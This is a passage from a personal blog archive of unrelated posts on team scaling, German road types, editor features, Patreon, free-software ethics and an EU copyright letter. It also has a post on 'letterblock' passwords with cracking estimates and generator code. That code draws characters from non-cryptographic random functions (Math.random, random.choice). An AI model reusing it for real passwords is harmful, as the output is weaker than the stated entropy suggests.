  2. Train 16 to 24 people. See 5. 15 of these will split in 3 sub-groups (5 people each)3 and act as mentors for the next step. These must be able to work without a trainer. 1 to 9 people can join the 1 to 3 from step 1 in preparing the workplace (7 sessions).
  3. Train 3 to 7 people (at least 1 person per sub-group) to be able to act as trainer (1 session).
  4. Train three sub-groups of 12 to 18 people each. See 4. From each group at least 7 mentors and one trainer will be needed for the next step. 5 to 11 people per sub-group can start preparing the sub-group workplace (5 sessions).
  5. Train three sub-groups of 20 to 30 people. See 6 (9 sessions).

At this point you have an organization of 77 to 135 people with an administration group whose members have all worked with at least one person from every group.

After step 2 there are 1 to 9 people who already work and who know all the mentors for the subgroups. If these take over organizational duties, every sub-group will have members who know the organizational group.

If you take one day per session, this training will take about 6 weeks.

If you split each of the sub-groups into around 6 workgroups with 5 members each, so each group can work well and grow or shrink by 30% if needed, and split the people who started the initial preparation into an administrative and an infrastructure group, you’ll have a structure which looks similar to Figure 1.

team-starter-structure.png

Figure 1: Organizational structure for 77 to 135 people with one hierarchy level.

(8) Start an organization of 250 people as connected group (37 sessions)

To scale this higher, you can continue after the last step of 7.

  1. 15 people in each of the three sub-groups split again into three sub-sub-groups each (5 people each) and act as mentors for the next step. These must be able to work without a trainer. 5 to 15 people can prepare a secondary administration tier.
  2. Train three times three sub-sub-groups of 12 to 18 people. See 4 (5 sessions).

Now there are 140 to 252 people in three levels.

You can still roughly double the size by having 5 to 11 people from each of the sub-sub groups train three times three sub-sub-groups of 20 to 30 people. See 6 (9 sessions).

(9) Conclusions

This article provides the tools to build strongly connected teams of up to 30 people — teams where everyone has worked with everyone else while group sizes never increased beyond seven.

In 7 and 8 the article provides additional tools to build larger groups by using organization groups (administration and infrastructure) as centralized connection between the subgroups.

Footnotes:

1

The number 7 stems from George A. Miller (1956), The Magical Number Seven, Plus or Minus Two: Some Limits on our Capacity for Processing Information, published in Psychological Review, 63, 81-97.

2

This structure was devised originally for scaling roleplaying weekends from 6 to 12 people while still ensuring that everyone played with everyone else at least once.

3

The groups need 5 mentors instead of the 3 from 4, because there will not be a trainer.

Attachment  Size
team-starter-structure.png  15.93 KB
2016-01-25-Mo-team-starter.org  12.97 KB
2016-01-25-Mo-team-starter.pdf  243.25 KB

The exhaustive guide to German Streets

This is no absolute truth.

Name           For pedestrians   For Bikes           For Cars   Special                               english
Autobahn       -                 -                   x          No Speedlimit, unless specified       Autobahn
Bundesstraße   -                 if no fahrradweg    x          paid by federal government            road
Landstraße     -                 if no fahrradweg    x          paid by county, often narrower        road
Straße         if no fußweg      if no fahrradweg    x                                                road
Gasse          x                 x                   x          mostly narrow                         road
Weg            if no fußweg      if no fahrradweg    x          often not paved                       way
Fahrradweg     -                 x                   -          -                                     bikepath
Fußweg         x                 depends             -          bikes can be allowed by a sign        ?
Feldweg        x                 x                   x          often just a mudpath                  path
Waldweg        x                 if wider than 2m    depends    no one adheres to the 2m
Pfad           x                 x                   depends    often of clay or gravel               path
Trampelpfad    x                 if wider than 2m    -          mud, no one adheres to the 2m         path
Wildwechsel    x                 -                   -          maybe mud, used by daring cyclists    path

If you spot any type of road I missed, please write to arne_bab@web.de with subject Straßenwissen.

Trajectories of Carbon from Tokyo

couldn’t resist this one ☺

I was only plotting trajectories of carbon dioxide from Tokyo, when this came up:

Trajectories of Carbon from Tokyo

How it began:

The deep ones!

Cthulhu fhtagn! ☺

(the line in gibberish1 says "In seinem Haus in R’lyeh wartet träumend der tote Cthulhu" (in English: "In his house at R’lyeh dead Cthulhu waits dreaming") — Ph'nglui mglw'nafh Cthulhu R’lyeh wgah’nagl fhtagn).

Published here with permission from NOAA ARL, under the condition that I make it clear that they are not producing these images for me. Which I hereby do: To produce these images I used the great HYSPLIT from NOAA ARL, but the images were not created by NOAA for me.


  1. The gibberish is actually DEK shorthand: german stenography ☺ 

Attachment  Size
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo.jpg  990.73 KB
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo-400x520.jpg  99.69 KB
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo-only-bottom-big.jpg  316.97 KB
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo-only-bottom.jpg  20.56 KB

What I need from IntelliJ and what I deeply miss when I’m not using Emacs

Updates will be written on my new site: draketo.de/software/intellij-emacs

At work I’m using IntelliJ for Java development, but I’m not happy with the interface. It forces me out of my concentration and regularly breaks my flow by having stuff jump around and stealing focus.

But I cannot switch to something that works better for me, because there are features of IntelliJ that I require to work efficiently.

1 What I really need from IntelliJ

1.1 inspection

  • Where is this called? — all callers
  • Where is this implemented? Where is it declared? Or overridden?
  • Visual indicator whether a method is overridden or whether it overrides
  • Where is this defined (base method or concrete method)?

1.2 refactor

  • rename symbol,
  • change signature (with base method and overrides and callers),
  • extract method from selection,
  • extract variable / store selected expression in variable

1.3 run

  • Run tests in changed modules or in file
  • re-run test, restart current program
  • re-build incrementally
  • hot-swap without restart

1.4 debug

  • set breakpoint and see breakpoints, set conditional breakpoint
  • run project via eclipse run config main method (we replaced the eclipse stuff extracted with Eclipser by main methods)
  • inspect stack and state at break point
  • step over / in / out / continue

1.5 other

  • Jump to definition / caller (also with mouse CTRL-click), even for xml, so colleagues can do it when working at the same box
  • show all methods in file
  • VCS: ignore changes in some files
  • run Sonar Qube on changed files

2 What I deeply miss when not using Emacs

2.1 keyboard shortcuts

  • mnemonic keybindings: When I type C-x r t, I think x-rectangle-text. That is why it works across different keyboard layouts.
  • staying on the letter row

2.2 editing

  • killing to the end of the line with C-k (I actually added that to IntelliJ now)
  • cycling through the cut-paste list with M-y: Often I don’t need the last kill, but the one before. Yes, I can reach for the mouse and use klipper, but that slows me down and breaks my concentration. ——— C-S-v in IntelliJ uses paste from history
  • storing and retrieving multiple values with registers.
  • Completion which replaces the suffix, or at least M-d (Alt-d): kill word or rest of word. ——— You can remap Alt-d in IntelliJ to kill to word end
  • Activate selection mark, navigate, kill all code in-between mark and current point. The Emacs live plugin is close, but not good enough.

2.3 windows

  • Commands with M-x, fuzzy matched, and without settings-window-names getting in the way. I can halfway replace that with C-S-a
  • closing other windows with x1 (actual "x1" thanks to key-chords-mode). Deeper: Natural use of multiple windows.
  • storing a window configuration in a register and retrieving it later
  • Truly having two windows side-by-side with two points and switching with xo or xö (C-x o).

2.4 files

  • Fuzzy matching in buffer-list with bf (as chord or with C-x b).

2.5 interop

  • Linking to code files from my org-mode planning file.

2.6 movement

  • dumb-jump to test
  • Navigation with C-n / C-p / M-b / M-f. That avoids having to move to the arrow keys.
  • back to last edit which stays in the buffer. I can switch between buffers with bf, and after I just want to go back to where I last edited this buffer. Multi-file back-to-last-change is also nice (as IntelliJ provides it), but it’s not complete.

2.7 Feeling fast

  • Somehow all the things I need to do in IntelliJ feel slow. Maybe that’s because a million lines of code is a lot. Maybe because it keeps a huge amount of state. Or because Maven is slow. But it feels like I’m regularly waiting for something to refresh itself.
  • IntelliJ feels slow, because it often opens dialogs before they accept keyboard input. To reproduce: start a global search (with CTRL-shift-F) and start typing. It misses my first keystrokes. Emacs takes all keystrokes.

2.8 other

  • Having the shell just an M-! away, in the same folder as the code file.
  • ripgrep
  • A colleague said today “I wish we had tabs grouped by type”. I could not suppress saying “emacs does this — with tabbar-mode”.
  • Inline merge-conflict highlighting (I actually switch from IntelliJ to Emacs for that).
  • glasses-mode to highlight capital letters in camelCase.

Wicked Words! on Patreon

John Wick is entering the patreon arena with the Wicked Words! Magazine: Adventures, GM Advice, Little Games, Stories, The Works!

There’s an update with a Happy ending on 1w6.org/english/wicked-words-patreon!

  Yay!

This is really good news for online publishing, because it shows by example how roleplaying games and short stories enter a new stage on the web: fan-funded periodicals. I expected this to become mainstream much earlier, just as webcomics became big a few years ago, but the hassle of paying small amounts online has been a major impediment, I think. And unlike webcomics, it is pretty hard to fund good writing with advertising without scaring away your readers: Text needs prolonged attention.

With Patreon this is now easy - you can assure a creator that they will get money for every work they create, as long as they keep creating works which you enjoy.

  Nay…

There are only two problems with the approach by John Wick:

(1) “You'll need to enter your credit card information before you can start pledging to support your favorite creators. We use Stripe to handle our incoming payments. PayPal support is coming soon.”

No, I do not want to get (or use) a credit card for that.

They should just get a European partner who handles bank transfers - that should be easy now that there’s SEPA. Flattr should already have all the infrastructure for that in place - and actually provides an orthogonal service, so it would not endanger its own business model by collaborating with Patreon.

(2) The Wicked Words! magazine is otherwise only available for payment, so Patreon just acts as a subscription service.

Generally Patreon is similar to Flattr - but where Flattr caters to the patrons (you have a giving flatrate which is spread over the things you see), Patreon caters to the creators (they get ensured income). And releasing only to Patrons massively undersells the chances of Patreon: After all, I want to be patron, because I like something and not because that’s the cheapest way to get it.

  Utopia

Ideally a creator should use both Patreon and Flattr: Give patrons something extra (for example a mention - just something which creates warm fuzzy feelings), but also release everything for free on the web - with a Flattr button, so people who come across it can contribute.

That would also make it easy for me to share a PDF with my players and know that my players can give extra money if they like it.

  It works!

For example Smooth Mc Groove does that: Patrons get the same videos as all others, but they have the good feeling that they ensure that he can keep creating, and you can voluntarily support him via flattr if you liked what you watched - which I regularly do.

This two-tiered approach to self-financing allows fans to support their idols while also making it easy to discover and support new stuff, because Patreon makes it easy to promise regular payment and as soon as you use Flattr, there is virtually no barrier anymore to support someone new. And if you happen to flattr the creator often, you can think about becoming a patron.

And this is where I hope Wicked Words! will move, too: Freedom for Patrons to share, freedom for casual readers to give when they want and a secure income for the creators.

fonättikl inglisch

The slaves we freed,

This is what I read,

And yesterday I read,

That they all fled.

PS: The title is “phonetical english”, written in a way that Germans can just read it aloud to pronounce it correctly.

letterblock passwords: secure, memorable, easy to type

Update 2021: An improved version that is viable for analog password creation can be found at Letterblock Diceware Passwords.

Do you want to have secure passwords which are memorable and easy to type? Did you use diceware just to find out that the rate of typos when writing 6 words with 30 letters in total without seeing what you type can be aggravating — especially when you have to enter your password several times a day?

The algorithm here generates secure Letterblock passwords which are easy to type and to remember.
Get this code via npm install securepasswords
There is also a version in Python and one in wisp Scheme.

 

A major part of this article is concerned with a security estimate of the generated passwords, but first off, here’s an example of a password which should survive an attack leveraging all smartphones on the planet until at least 2021 at the current development speed of technology:

hXFV!4Vgf-LrgS

And here’s one which should outlast a type II civilization:

HArw-CUCG+AxRg-WAVN-5KRC*1bRq.v9Tc+SAgG,QfUc

Let’s ramp up security of passwords while making them easier to remember.

Update Also see Keylength - ECRYPT II report on key sizes. The report provides a clean overview of several different recommendations. In short: Use 128 bits. With the method shown here this is equivalent to using 5 blocks of 4 letters (length 20).

Password Generation

The method used here is pretty simple: Use blocks of four letters, chosen at random from a set of safely recognizable characters which are in the same position on German and US Keyboards. Delimit blocks by a delimiter chosen at random from another set of characters.

The sets of characters are:

For the blocks: NewBase60 without yz_. 55 letters, 5.78 bits of entropy per letter.

define qwertysafeletters "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx"

For the delimiters: ,.! plus symbols from the numpad. 7 letters, 2.8 bits of entropy per delimiter

define delimiters ",.+-*/!"

These passwords hit the same letters on US and German keyboards, because I’m from Germany, and having to find letters like $#:\; is horrible when the keyboard reverted to US English, or when typing on the keyboard of a colleague.

Code to realize this is given in the Appendix.
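The entropy numbers used in the following estimates follow directly from these two character sets. A small sketch of that bookkeeping in Python (one delimiter after every completed block of four letters, as in the generators in the Appendix):

from math import log2

LETTERS = 55      # block alphabet: about 5.78 bits per letter
DELIMITERS = 7    # delimiter alphabet: about 2.8 bits per delimiter

def entropy_bits(nletters):
    """Bits of entropy of a password with nletters block letters."""
    ndelimiters = (nletters - 1) // 4   # one delimiter after each full block of 4
    return nletters * log2(LETTERS) + ndelimiters * log2(DELIMITERS)

print(entropy_bits(8))    # about 49 bits: 8 letters, 1 delimiter
print(entropy_bits(12))   # about 75 bits: 12 letters, 2 delimiters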

Security estimate

(the code for all these calculations is available in securepassword.w from the wisp repository)

Speed of current attacks

As of 2011, a single device can do 2,800,000,000 guesses per second. Today this should be 10 billion guesses per second. According to a recovery company which sells crackers at 1.5k$, as of 2016 a zip-file can be attacked with 100,000 guesses per second. Ars Technica reports 8 billion attacks on md5 on a single device in 20131.

Codinghorror quotes2 codohale3 on the cost of buying 5 billion cracked md5 hashes per second in 2010 for just 3$ per hour. This should be around 20 billion guesses per second today.

I will from now on call 20 billion guesses per second for 3$ per hour the "strong attack" and 100,000 guesses per second the "weak attack".

8 letters + 1 delimiter: 12$ (strong attack) or till 2031 (weak attack)

A password with 8 letters and 1 delimiter (entropy 49) would on average withstand the strong attack with a single device for 4 hours, so you could buy a cracked md5-secured 8 letter + 1 delimiter password for 12$ (assuming that it was salted, otherwise you can buy all these md5’ed passwords together for around 24$).

The 8 letter and 1 delimiter password would withstand the weak attack until 2031 (when it would be cracked in one year, with a cost of 26k$), assuming doubling of processing power every two years. Cracking it in one day would be possible in 2048, paying just 72$.

(yearstillcrackable 49)
=> ((in-one-second 64.78071905112638)
    (in-one-day 31.983231667249996)
    (in-one-year 14.957750741642995))
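The yearstillcrackable helper from securepassword.w can be approximated in a few lines of Python. This sketch assumes, as stated above, that processing power doubles every two years, and it reproduces the numbers shown here:

from math import log2

def yearstillcrackable(entropy, guesses_per_second=1e5, number_of_devices=1):
    """Years until an attack of the given duration can try all 2**entropy
    guesses, if the attack speed doubles every two years."""
    def years(seconds):
        guesses_today = guesses_per_second * number_of_devices * seconds
        return 2 * log2(2 ** entropy / guesses_today)
    return {"in-one-second": years(1),
            "in-one-day": years(24 * 60 * 60),
            "in-one-year": years(365.25 * 24 * 60 * 60)}

print(yearstillcrackable(49))   # reproduces the values shown above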

12 letters, 2 delimiters: till 2047 (strong) or 2021 (Facebook)

A password with 12 letters and 2 delimiters (length 12, entropy 75) should withstand the strong attack until 2047 (then it would be cracked in one year), assuming doubling of processing power every two years, the weak until 2083.

For every factor of 1000 (i.e. 1024 computers), the time to get a solution is reduced by 20 years. Using every existing cell phone, the 12 letter key would be cracked by the method with 100,000 guesses per second in 2021 (within one year). Facebook could do that with Javascript, so you might want to use a longer password if your data has to be secure against the whole planet for longer than 5 years.

(yearstillcrackable 75 #:guesses/second 1.e5 #:number-of-devices 2.e9)
=> ((in-one-second 54.986013343153864)
    (in-one-day 22.188525959277467)
    (in-one-year 5.163045033670471))

28 letters, 6 delimiters: outlast human civilization

Using Landauer’s principle4, we can estimate the minimum energy needed to check a password solution with a computer at room temperature, assuming that reversible entropy computing isn’t realized and quantum computers have to stick to Landauer’s limit: A single bit-flip requires approximately 3 Zeptojoule5 at room temperature, so we can flip 333e18 bits per second with one Watt of energy. Processing any information requires at least one bit-flip. Reducing the temperature to 1.e-7K (reachable with evaporative cooling) would theoretically allow increasing the bit flips per Joule to 1e30. That gives a plausible maximum of password checks per expended energy. Assuming that someone would dedicate a large nuclear powerplant with 1 Gigawatt of output to cracking your password, a 160 bit password would withstand the attack for about 23 years.

With the password scheme described here, a password with 28 letters and 6 delimiters (178 bits of entropy) should be secure for almost 6 million years in the Landauer limit at 1.e-7K, with the energy of a large nuclear power plant devoted to cracking it.

(years-to-crack-landau-limit-evaporative-cooling-nuclear-powerplant 178) => 6070231.659195759
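The Landauer-limit estimate works the same way. A sketch using the numbers from the paragraph above (1e30 bit flips per Joule at 1.e-7K, one bit flip per guess, a 1 Gigawatt power plant, and on average half the key space to search):

SECONDS_PER_YEAR = 365.25 * 24 * 60 * 60
FLIPS_PER_JOULE_COLD = 1e30   # Landauer limit at 1.e-7K, as estimated above
POWERPLANT_WATT = 1e9         # one large nuclear power plant

def years_to_crack_landauer(entropy):
    """Years to search half the key space (the average case) at this limit."""
    guesses = 2 ** (entropy - 1)
    guesses_per_second = FLIPS_PER_JOULE_COLD * POWERPLANT_WATT
    return guesses / guesses_per_second / SECONDS_PER_YEAR

print(years_to_crack_landauer(178))   # about 6 million years
print(years_to_crack_landauer(160))   # about 23 years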

With 24 letters and 5 delimiters it would only last about one month, though. Mind exponentials and the linear limit of the human lifespan :)

An example of a 28 letter, 6 delimiter password would be:

7XAG,isCF+soGX.f8i6,Vf7P+pG3J!4Xhf

Don’t use this one, though :)

36 letters, 8 delimiters: outlast a type II civilization

However using the total energy output of the sun (about 0.5e21 W), a 28 letter, 6 delimiter password would survive for just about 6 minutes. To reach 50 years of password survival against an attacker harnessing the energy of the sun (a type II civilization on the Kardashev scale6 devoting its whole civilization to cracking your password), you’d need 200 bits of entropy: 32 letters and 7 delimiters. A 36 letter, 8 delimiter password (230 bits of entropy) would last about 54 billion years. With that it would very likely outlast that civilization (especially if the civilization devotes all its power to crack your password) and maybe even its star. They could in theory just get lucky, though.

If you ever wanted to anger a type II civilization, encrypt their vital information with a 36 letter, 8 delimiter password like this:

HArw-CUCG+AxRg-WAVN-5KRC*1bRq.v9Tc+SAgG,QfUc

Keep in mind, though, that they might have other means to get it than brute force. And when they come for you, they will all be really angry :)

Or they might just have developed reversible computing, then all these computations are just a fun game to stretch the mind :)

Conclusion

Passwords built from delimited blocks of letters are easy to memorize and if you use 12 letters with 2 delimiters it should even withstand everything Facebook can throw at you for a few years, if you use a serious hashing algorithm.

So please make your next password look like this:

a70q-PjoL.wmew

You can generate a new password with the code in the appendix (but please do not trust a generator on a website, except if you copy this website and use it offline).

If you want to anger a whole type II civilization, you’ll have to go for 36 letters, though.

Appendix: The code

Javascript

/* @license magnet:?xt=urn:btih:0ef1b8170b3b615170ff270def6427c317705f85&dn=lgpl-3.0.txt LGPL-v3-or-Later */
var letters = "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx";
var delimiters = ",.+-*/!";
function password(nletters) {
    var pw = "";
    for (var i=0; i<nletters; i++) {
        if (i%4 == 0 && i != 0 && i != nletters){
            pw += delimiters.charAt(Math.floor(Math.random() * delimiters.length))
        }
        pw += letters.charAt(Math.floor(Math.random() * letters.length));
    }
    return pw;
}
/* @license-end */

Python

from random import choice
letters = "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx"
delimiters = ",.+-*/!"
def password(nletters):
    """
    Generate a password with the given number of letters (not counting
    delimiters).
    """
    pw = ""
    for i in range(nletters):
        if i%4 == 0 and i != 0 and i != nletters:
            pw += choice(delimiters)
        pw += choice(letters)
    return pw

Wisp (original code)

Full code available in securepassword.w

import
    only (srfi srfi-27) random-source-make-integers
      . make-random-source random-source-randomize!
    only (srfi srfi-1) iota
    srfi srfi-42

;; newbase60 without yz_: 55 letters, 5.78 bits of entropy per letter.
define qwertysafeletters "0123456789ABCDEFGHJKLMNPQRSTUVWXabcdefghijkmnopqrstuvwx"
;; delimiters: 2.8 bits of entropy per delimiter, in the same place on main keys or the num-pad.
define delimiters ",.+-*/!"

define random-source : make-random-source
random-source-randomize! random-source

define random-integer 
       random-source-make-integers random-source

define : randomletter letters
      string-ref letters
        random-integer
          string-length letters

define : password nletters
       . "Generate a password with the given length in letters 
(not counting delimiters)."
       list->string
         append-ec (: i (iota nletters 1))
           cons : randomletter qwertysafeletters
             if : and (not (= i nletters)) : zero? : modulo i 4
                cons : randomletter delimiters
                  list
                list

timezones of tccon stations

Timezones of the most active TCCON stations in UTC+x (without daylight saving time, DST), because I needed it and could not find a simple list quickly.

anmyondo: +9,
ascension: 0,
bialystok: +1,
bremen: +1,
caltech: -8,
darwin: 9, # Timezones2008 says 9 1/2???
eureka: -6,
garmisch: +1,
izana: 0,
jpl: -8,
karlsruhe: +1,
lamont: -6,
lauder: +12,
nyalesund: +1,
orleans: -6,
parkfalls: -7,
reunion: +4,
saga: +9,
sodankyla: +2,
tsukuba: +9,
wollongong: 10

via the list from the TCCON wiki, Timezones2008 from Wikimedia and Marble Desktop Globe.


free software, unfree software, ethics and social behaviour

Some of my answers to basic questions

Written in a survey about attitudes towards free software.

Is proprietary (=unfree) software immoral or unethical?

It isn't immoral (moral = what's the current stance of mainstream society), but it is unethical when solidarity and self-determination are part of your ethical axioms.

In a society where people are used to being forbidden to give bread to a starving child, giving bread you'd otherwise throw away to that child instead could well be immoral.

So only software which allows you to act ethically is ethical - and that's free software. Even better is free software under strong copyleft licenses like the GPL, because that protects our right to act ethically for any future versions of the software.

Do you believe that proprietary software is "illegitimate"?

No.

Legitimate doesn't mean "not contrary to existing law". Even in countries where the police are allowed to torture people, torture is illegitimate. At least that's my understanding: calling something illegitimate means that it is wrong and should be forbidden.

I believe that people have the right to make unfree software (people also have the right to do tv-shows like "popstars"). I don't think anyone should use that software, though.

I can't force people to adhere to my code of ethics without acting against my ethics myself. But I can try to convince them that my understanding of ethics is right.

Do you believe that proprietary software is "antisocial"?

In many cases yes. But it depends on the case.

Note

If I had to develop unfree software to earn enough to live a more or less comfortable life, I'd likely choose to do so. That's why I fight now, so I can earn money ethically later on. Or at least enable my children to do so (in more detail in German).

"Creative Content in a European Digital Single Market: Challenges for the Future"

-> sent to avpolicy@ec.europa.eu, markt-d1@ec.europa.eu in reply to "Creative Content in a European Digital Single Market: Challenges for the Future" as published by the European Commission.

Thanks to Glynmoody for getting the word out!

Dear European Commission,

Summary: The goal of copyright is to get more money to more authors and more cultural works to more citizens. Due to the changes the free copying of the internet brings, additional protection doesn't help achieve that goal.
The proposal paper goes into many technical details, but loses the focus on the benefit of copyright to the citizens - and what kind of copyright protection is useful today.
Due to this, many of the measures (especially DRM) have to be reevaluated to see whether they really benefit our society and cultural development, or only try to cement a status quo which doesn't benefit the citizens in the light of the changes to technology and consumption of cultural works.

Please keep in mind that copyright is not an inherent right. Instead it's a state-granted information monopoly with a simple goal: increase the quality and quantity of creative works available to everyone.

As such, copyright law grants authors (copyright holders) the right to control who may be in possession of their works, because being able to make money with one's creations helps create more and higher quality works.

Also it grants middlemen the right to make money from copies by establishing contracts with authors. These middlemen are useful as long as they offer a major contribution in getting the works to the public and getting money to the author.

And it grants fair use rights to all citizens, which helps spread the works and enables more people to enjoy our culture the way they enjoy it most. These fair use rights are accompanied by flat payments which are given directly to the authors, so creators of creative works receive money from an additional pool whose size is related to the amount of cultural works people share.

Currently the best balance between these different kinds of rights (copyright of the creator, use rights of the middlemen and fair use rights of the citizens) is changing due to the almost cost-free copying of digital content.

Now the middlemen often no longer serve as waybuilders between authors and citizens, but as gatekeepers who lock out citizens from our culture. Also they often take a high percentage of the money citizens pay for cultural works, even though their costs for spreading works (and finding good works) were reduced greatly. When a musician gets a few tenths of a Euro from each sale of a 15 Euro CD, it's quite clear that the middlemen use up money which then doesn't help the authors create more cultural works.

Traditional (expensive) ways of spreading content are being made unnecessary by the faster ways of spreading content digitally. But the middlemen control the flow of content from author to citizens (partly by copyright law), and they use their control to draw a major share from the money citizens want to give the author of the works they enjoy.

More: They often also hinder citizens from telling others about the works they like. In the digital world, people can instantly send music they enjoy to their friends, and if their friends like it, they can buy it - or send it onward to other people who might like it more. And once someone gets something she/he enjoys very much, she/he usually wants to give the author money, so the author can create more works she/he enjoys.

By using "illegal downloads", people learn about new works and decide whether they are worth paying money - and recent studies show that those who use p2p networks to download music illegally are also the ones who buy the most music.

Because of this, I think that the paper focuses too much on the "protection of the copyright holders" and too little on the question of how laws can help make as many cultural goods as possible available to every citizen. So I want to offer some thoughts:

To achieve that goal, copyright always has to strike a balance between different objectives:

1) Authors need money to be able to work full time. So they want as much money as possible for their works. Some kinds of works take far longer to create, but have great cultural value (for example science books and investigative journalism), so authors who spend very much time on research (or similar) need a way to earn enough from their work, even though they have a smaller quantitative output.

2) Citizens want to get as many cultural works they enjoy as possible for the money they have available.

3) Authors and citizens need to find each other, so the citizens can find works they enjoy.

4) Cultural works have to be brought from the authors to the citizens and money has to be brought from citizens to authors of works they enjoy (with as little loss as possible). "Bringing works to the citizens" can include polishing the work, so the citizens can enjoy the works more. A book with 10 errors on each page is very hard to enjoy for most people, as is one with glaring errors in the plot. And a CD without a cover image will find far fewer listeners, regardless of the quality of the music.

In earlier times, the balance which brought citizens the highest amount of cultural works they enjoy was to have big middlemen who were able to shoulder the high cost for printing books, recording tapes, pressing CDs and carrying these from country to country (as well as a part of the risk of promoting unknown authors).

Today the cost for spreading cultural works is almost zero (more exactly: we already pay it by paying for our broadband connections), and finding an author I enjoy is easier with a search engine or with resources written by online communities for free, so the best balance has shifted. Due to this, having stronger fair use rights (so people can more easily pass on works and turn others into paying fans of an author) could be a far more efficient way to bring cultural works to everyone while paying the authors.

And stronger protection of "rightholders" (which today more often serve as gatekeepers than waybuilders) could backfire quite badly and harm the cultural development of Europe (even today musicians complain that they only get a very minor share of the money people pay for their works).

And since the cost of spreading a cultural work to people is almost zero (with technologies developed in filesharing communities, even the bandwidth cost drops to almost zero, since every participant contributes some bandwidth for spreading the work), there is no real reason why someone who has only 15€ to spare each month should enjoy far fewer cultural works than someone who earns 10.000€ a month.

In earlier times, if a poor person spent 15€ on a book, more than 10€ were needed to pay for producing the book. That was a natural restriction on the number of works he could enjoy. 5€ went to the author he liked best (if the author was very lucky), because he could only pay for at most one book. He couldn't afford to read works from other authors.

Today that same person could read 15 books and pay 5€ to the 3 authors she/he likes best, and the author of the first book would gain just as much money, two others would get money (who wouldn't have gotten money otherwise), and the remaining 12 authors wouldn't lose anything compared to the high-production-cost alternative.

And this clearly shows a glaring error in ever increasing the "protection" of monopolies: Someone who has 15€ to spend on cultural works doesn't get more money to spend if he can't read works for free. So the main question is how to get the people to give the money they have available to the authors while giving them as much access to cultural works as possible. And since for example in Germany about 50% of the citizens have too little money to pay any relevant amount of taxes, this thought is valid for about 50% of the people in Germany.

Adapting copyright laws to the current times has to take into account how copyright laws benefit the society. Copyright monopoly rights are being granted by the state (since we're living in a democracy that means: by all citizens) to individuals for the benefit of all citizens. So the goal of any copyright change should be to benefit all citizens.

It is in the interest of society that as many people as possible can enjoy as many cultural works as possible.

Criminalizing most citizens doesn't come close to that goal. And restricting what people can do with works they purchased (DRM), doesn't achieve that, either. Both only protect the middlemen, but neither the authors (or their income from which DRM is effectively financed), nor the citizens. DRM makes spreading cultural works more expensive, so it harms authors as well as citizens. It adds a needless control structure which sucks away money that should go to the authors.

And people like Howard Taylor (the creator of the free webcomic http://schlockmercenary.com) and all the free software programmers out there who make a living with their programming show that many citizens today are mature enough to pay for the things they enjoy, even though there is no gatekeeper forcing them to.

So please leave the "we need more protection" track. What we need is more money for more authors and more cultural works for citizens.

Cementing the current power-structures in creative business despite the changing technological environment doesn't achieve that.

When considering how a single market (a market accessible to everyone in the same way) affects the creation and spreading of creative works, the focus should instead be on comparing the different possible approaches to strengthening the creation and spreading of cultural works, and on seeing which balance between these ways is most efficient. This requires rethinking the support which copyright law gives to the different revenue sources of authors (flat payments on copying devices, income from direct sales, money from middlemen, money from "additional value products" like signed copies, direct donations by fans so they keep producing, and many more), and as such adjusting the balance between state-granted monopoly rights for authors, state-granted monopoly exploitation rights for middlemen and fair use rights of citizens to make it fit the current technological and social situation.

There's one more interesting fact on that topic I want to spotlight: The German group for distributing the money from flat payments on printers and photocopiers, "VG-Wort"1, now pays webloggers with money from flat payments, because they acknowledge that weblogs create a considerable share of currently consumed cultural works. Since most webloggers work without direct payments, this is a major change for the commercial viability of creating works which are freely available to everyone with an internet connection, regardless of the financial situation.

At the same time, projects like Creative Commons2 show that for a major share of authors of creative works it is most important that no one can misrepresent their content as the creation of someone else, while "forbidding people to pass on the work without making money from it" isn't very interesting (and isn't even useful financially for lesser known authors, because it stops people from spreading the word about the author).

So the first question to be answered is not "how can we ensure that the copyright protection holds in the light of current technology", but "which balance of monopoly protection, fair use rights and direct state support of authors (like the sponsoring of theaters in Germany) is most efficient in achieving the goal of enabling as many citizens as possible to have access to as many cultural works as possible in the changed technological environment". Detailed questions about monopoly protection schemes and such (and which of them benefit our society today) only make sense once this basic question has been answered for the current situation.

And "Copyright is the basis for creativity" isn't an answer to that question, because it a) is clearly wrong. People created at all times, while copyright law is only a few hundred years old, and b) doesn't answer, how copyright law benefits European citizens - and how that benefit changes with digitization where every act of viewing is in fact a copy.

Best wishes, Arne Babenhauserheide

PS: Some additional notes:

  • on differing content and goals: The content of the article gives a nice overview of problems of the current licensing system between companies, while the 'Strategy for "Creative Content Online"' talks of goals (DRM, filesharing prevention) which are barely touched by the content.

  • on the focus of the paper: Important topics like user-created content are only named, but missing the simple point that most of these works are simply illegal today. Companies can clear their licensing with each other - they don't necessarily need new rights for that. But most citizens can't. They can't just sit together and decide to only buy media licensed under specific terms, because the companies can almost completely control the supply. Ordinary citizens are the ones who need clearer laws. And in a democracy, they are the ones for whom laws should be made.

  • on "financial incentives for creatives": As psychological studies show, creativity is best fostered by giving creatives enough money to live a comforting live, but the hunt for as much money as possible can stifle creativity instead of strengthening it. So strengthening a single-minded market-driven revenue model for a state-given monopoly doesn't help create creative works of higher quality.

  • on the justification of copyright itself: You can also find related thoughts about the reasons for having certain kinds of copyright (in german) at http://draketo.de/licht/politik/geistiges-eigentum-sinn-des-urheberrecht...

  • on DRM systems: DRM systems establish a control inside people's computers which isn't in turn legitimated and controlled by the state. As such it takes the role of the police without being authorized by the state (which in turn is authorized by the citizens). To force citizens to accept this additional foreign control of their actions, middlemen abuse the monopolies granted by copyright law, because these give them the right to establish new rules on how their content may be consumed. That way the DRM restrictions are established with powers granted by the state, though they aren't legitimated by democratic processes. They even undermine fair use rights. Also any DRM system breaks the premise that people are free to act as long as they are willing to face the legal consequences. While I am free to ignore speed limits when I'm on the way to the hospital because my daughter is bleeding to death on the backseat, but might lose my driver's license afterwards (what's a driver's license compared to the death of a daughter?), a DRM system would keep me from taking that decision and would force me to let my daughter die, because my car simply wouldn't drive faster than allowed. That way DRM systems break the premise of the responsible citizen, but since any democracy requires responsible citizens as its basic premise, this reduces our whole legal system to absurdity. So DRM shouldn't 